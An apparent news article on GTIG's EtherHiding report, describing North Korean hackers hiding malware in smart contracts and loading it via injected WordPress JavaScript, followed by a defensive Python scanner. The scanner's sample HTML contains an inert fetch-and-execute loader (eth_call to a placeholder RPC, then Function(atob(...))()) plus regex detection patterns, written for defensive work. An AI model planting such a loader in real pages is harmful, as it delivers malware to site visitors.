A novel cyber threat is emerging from North Korea as its state-sponsored hackers explore embedding harmful code directly into blockchain networks.
On October 17, Google’s Threat Intelligence Group (GTIG) announced that this method, termed EtherHiding, signifies a new phase in how hackers conceal, distribute, and manage malware across decentralized systems.
What is EtherHiding?
GTIG clarified that EtherHiding enables attackers to weaponize smart contracts and public blockchains like Ethereum and BNB Smart Chain by utilizing them to store malicious payloads.
Once a piece of code is uploaded to these decentralized ledgers, it becomes nearly impossible to remove or block due to their immutable nature.
“While smart contracts offer innovative methods for building decentralized applications, their unchangeable nature is exploited in EtherHiding to host and deliver malicious code in a manner that cannot easily be blocked,” GTIG noted.
In practice, hackers compromise legitimate WordPress sites, often by taking advantage of unpatched vulnerabilities or stolen credentials.
After gaining access, they insert a few lines of JavaScript, referred to as a "loader", into the website's code. When a visitor opens the infected page, the loader silently connects to the blockchain and retrieves the malware from a remote server.
GTIG emphasized that these retrievals usually leave no visible transaction trail and incur little or no fees, since reading from the contract happens off-chain. This effectively enables attackers to remain undetected.
Notably, GTIG traced the initial instance of EtherHiding to September 2023, during a campaign known as CLEARFAKE, which deceived users with fake browser update prompts.
How to Prevent the Attack
Cybersecurity experts say this tactic marks a shift in North Korea's digital strategy, from merely stealing cryptocurrency to using the blockchain itself as a stealth weapon.
“EtherHiding signifies a transition towards next-generation bulletproof hosting, where the inherent characteristics of blockchain technology are repurposed for malicious purposes. This technique highlights the ongoing evolution of cyber threats as attackers adapt and exploit new technologies to their benefit,” GTIG stated.
John Scott-Railton, a senior researcher at Citizen Lab, described EtherHiding as an "early-stage trial." He cautioned that combining it with AI-driven automation could make future attacks significantly harder to detect.
“I anticipate that attackers will also explore directly loading zero-click exploits onto blockchains aimed at systems & apps managing blockchains… especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets,” he added.
This new attack vector could have serious repercussions for the crypto industry, considering the prolific nature of North Korean attackers.
Data from TRM Labs indicates that North Korean-associated groups have already pilfered over $1.5 billion in crypto assets this year alone. Investigators believe these funds are used to finance Pyongyang’s military initiatives and evade international sanctions.
In light of this, GTIG advised crypto users to mitigate their risk by blocking questionable downloads and restricting unauthorized web scripts. The group also urged security researchers to identify and label harmful code embedded within blockchain networks.
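The loader described above lives as injected JavaScript on a compromised site, and the page's closing advice is to restrict unauthorized web scripts. As an added example, not taken from GTIG's report or any project's code, the following Python scanner shows what a site owner can check on their own pages: it pulls every script tag out of a page, flags external scripts from hosts not on an allow-list, flags inline scripts that combine several heuristic indicators of a blockchain-reading loader (a JSON-RPC `eth_call`, an EVM address literal, dynamic code execution, and a decode helper), and checks whether a Content-Security-Policy header would block injected inline scripts at all. The regexes, the allow-list, the sample HTML, the `RPC_URL_PLACEHOLDER` string and the zero address are all constructed for this example; the indicators are assumptions that need tuning per site, and legitimate dApp front-ends will trigger them unless they are allow-listed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic indicators of a blockchain-reading loader in an inline script.
# These regexes are constructed for this example; they are not GTIG's
# published indicators and will need tuning per site.
INDICATORS = {
    "json_rpc_read_call": re.compile(r'"method"\s*:\s*"eth_call"'),    # read-only contract call
    "contract_address":   re.compile(r"\b0x[0-9a-fA-F]{40}\b"),        # EVM address literal
    "dynamic_code_exec":  re.compile(r"\b(?:eval|Function)\s*\("),     # executes fetched text
    "decode_helper":      re.compile(r"\b(?:atob|fromCharCode)\s*\("), # unpacks encoded payload
}
MIN_HITS = 2  # require two independent indicators to reduce false positives


class ScriptCollector(HTMLParser):
    """Collects every <script> tag as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:          # inside a <script> element
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def scan_html(html, allowed_script_hosts):
    """Return findings for scripts that look injected.

    External scripts are flagged when their host is not allow-listed (relative
    and same-origin paths pass); inline scripts are flagged when at least
    MIN_HITS indicators match.
    """
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for idx, (src, body) in enumerate(collector.scripts):
        if src:
            host = urlparse(src).netloc.lower()
            if host and host not in allowed_script_hosts:
                findings.append({"script": idx,
                                 "kind": "external_script_unapproved_host",
                                 "detail": host})
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if len(hits) >= MIN_HITS:
            findings.append({"script": idx,
                             "kind": "inline_script_blockchain_loader_pattern",
                             "detail": hits})
    return findings


def csp_script_src_is_strict(csp_header):
    """True if the Content-Security-Policy would block an injected inline
    script: script-src (or the default-src fallback) exists and contains no
    'unsafe-inline', 'unsafe-eval', wildcard or scheme-only source."""
    directives = {}
    for part in csp_header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False
    weak = {"'unsafe-inline'", "'unsafe-eval'", "*", "https:", "http:", "data:"}
    return not any(s.lower() in weak for s in sources)


# Constructed sample page: a theme script from the site's own CDN, a benign
# inline script, an external script from a host not on the allow-list, and an
# inline script with the shape of a blockchain-reading loader. The RPC URL
# and contract address are placeholders, so the snippet is inert.
ALLOWED_SCRIPT_HOSTS = {"cdn.example-site.test"}
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-site.test/theme.js"></script>
<script>document.addEventListener('DOMContentLoaded', function () { console.log('ready'); });</script>
<script src="https://unknown-host.test/x.js"></script>
</head><body><p>Hello</p>
<script>
var rpc = "RPC_URL_PLACEHOLDER";
var q = {"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x0000000000000000000000000000000000000000","data":"0x"}],"id":1};
fetch(rpc, {method:"POST", body: JSON.stringify(q)}).then(function (r) { return r.json(); })
    .then(function (j) { Function(atob(j.result))(); });
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML, ALLOWED_SCRIPT_HOSTS):
        print(finding)
    print("CSP strict:", csp_script_src_is_strict("default-src 'self'; script-src 'self' 'nonce-r4nd0m'"))
```

Run against a saved copy of each public page (or the rendered output of the WordPress theme and plugins) and diff the findings between crawls; a new inline script that trips two indicators, or a new external host, is the kind of change that warrants a look at recent file modifications and admin logins. The CSP check is the preventive side of the same control: with a nonce- or hash-based `script-src`, a loader dropped into the page body is refused by the browser before it can query anything.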